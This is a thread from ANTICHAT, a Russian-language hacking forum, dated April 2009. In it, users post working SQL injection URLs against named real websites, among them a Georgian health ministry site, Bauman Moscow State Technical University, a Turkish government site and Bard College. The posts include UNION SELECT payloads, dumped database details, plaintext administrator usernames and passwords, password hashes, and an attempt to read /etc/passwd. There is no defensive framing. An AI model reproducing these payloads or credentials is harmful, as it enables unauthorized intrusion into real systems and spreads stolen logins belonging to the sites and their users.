ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8971  
Старый 23.04.2009, 13:05
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208

Репутация: 94
По умолчанию

Скуля на сайте http://www.healthministry.ge

Логин/пароль админа
http://www.healthministry.ge/eng/archive.php?Id=1994&act=full&catId=49+and+0+union+ select+1,2,3,4,concat_ws(0x3a,username,pass),6+fro m+moh_auth+limit+0,1+--+

Расшифровка логина/пароля:
moh:mohsmi7

Database Version: 5.0.45-Debian_1ubuntu3.3-log
Database name: moh
User name: healthge@localhost

На сайте разрешено индексирование:
http://www.healthministry.ge/eng/

Привилегий на чтение файлов нет. Доступа к mysql.user нет.
 
Ответить с цитированием

  #8972  
Старый 23.04.2009, 14:35
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

.museum =)
Цитата:
http://www.portail.wallonie.museum/en/map.php?id=-126+union+select+1,2,version(),4,5/*
Version: 5.0.45-community
User: aicim@swebdmz1.etnic.be
Dbname: mw
 
Ответить с цитированием

  #8973  
Старый 23.04.2009, 15:42
WebGer
Новичок
Регистрация: 30.11.2008
Сообщений: 10
Провел на форуме:
831221

Репутация: 25
По умолчанию

Официальный веб-сайт МГТУ им Н.Э.Баумана
http://bmstu.ru/history_pict.php?newsid='

Version: 5.0.45
User: bmstu_admin@localhost
Name: bmstu

Из интересного:
http://bmstu.ru/history_pict.php?newsid=22+union+select+login,pass +from+AdminUsers
http://bmstu.ru/history_pict.php?newsid=22+union+select+login,pass +from+wwwuser

Подбор таблиц:
http://bmstu.ru/history_pict.php?newsid=22+union+select+table_name ,table_schema+from+information_schema.tables+limit +39,30

Доступа к mysql.user нет.

Последний раз редактировалось WebGer; 23.04.2009 в 19:24..
 
Ответить с цитированием

  #8974  
Старый 23.04.2009, 17:01
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Дает XSS
Любая инъекция "дает" ксс, так что не позорься.

Код:
http://www.xyxb.cn/chem.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10
xueyuan@localhost:xueyuan:5.0.45-log
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Код:
http://www.grimmauldplace.ru/hb.php?id=1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4
u161432@10.10.223.227:u161432:5.0.67-log
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Код:
http://bitlis.meb.gov.tr/hb.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6
f1300_7a2zB3mtwa@10.30.1.66:f1300_7a2zB3mt9L84:4.0 .27-log

Последний раз редактировалось mailbrush; 23.04.2009 в 17:31..
 
Ответить с цитированием

  #8975  
Старый 23.04.2009, 19:20
+++AndreyDevil+++
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435

Репутация: 90
По умолчанию

http://www.bard.edu/cep/news/release.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*


Database Version: 4.0.18-standard
Database name: tools_new
User name: tools@masterweb.bard.edu
 
Ответить с цитированием

  #8976  
Старый 23.04.2009, 19:25
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Аудио-Видио клуб>>
Код:
http://www.av-club.ru/index.php?id=98+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5--+
5.0.45:av:av@localhost:redhat-linux-gnu
Код:
http://www.av-club.ru/admin/list.php
table: site_admins
db: arlex

admins:
log: nima
pass: dontworry

Sanyok:6fbaadf9839a3389fb77f38231957e1f
test:123
gali:e10adc3949ba59abbe56e057f20f883e
admin:202cb962ac59075b964b07152d234b70

loadf_file('/etc/passwd')
 
Ответить с цитированием

  #8977  
Старый 23.04.2009, 20:07
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.mukeshmarwah.net/b.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7
mukesh@172.16.0.141:mm-1967694:5.0.66a-log
 
Ответить с цитированием

  #8978  
Старый 23.04.2009, 20:32
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

www.cormoret.ch
Код:
http://www.cormoret.ch/pages/4.php?id=-67+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4--
version():5.0.45-log
user():cormoret@localhost
database():cormoretch

Последний раз редактировалось L I G A; 23.04.2009 в 20:57..
 
Ответить с цитированием

  #8979  
Старый 23.04.2009, 21:10
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Деловая махачкала>>
Код:
http://www.05info.ru/subcatalog.php?id=-322)+union+select+1,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8--+
Код:
http://www.05info.ru/admin/
Powered by phpBB 2.0.21
4.1.22-log-=*=-www05inforu-=*=-j05info@localhost-=*=-portbld-freebsd6.2
-=admin=-
table: phpbb_users
username: admin
user_password: 112233445566
+limit+x,x--+ - всего 104 узвера....
 
Ответить с цитированием

  #8980  
Старый 23.04.2009, 21:18
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.firstasset.com/products/fund.php?id= 1'
думаю что тут блинд SQL?
поетому решил через прогу все поискать))))

version():4.0.20
user():fafunds@web1.syonex.com
database():fafunds

спс)))как обычно не ставлю -1)))не знаю почему но бесит)))

Последний раз редактировалось HAXTA4OK; 23.04.2009 в 21:52..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ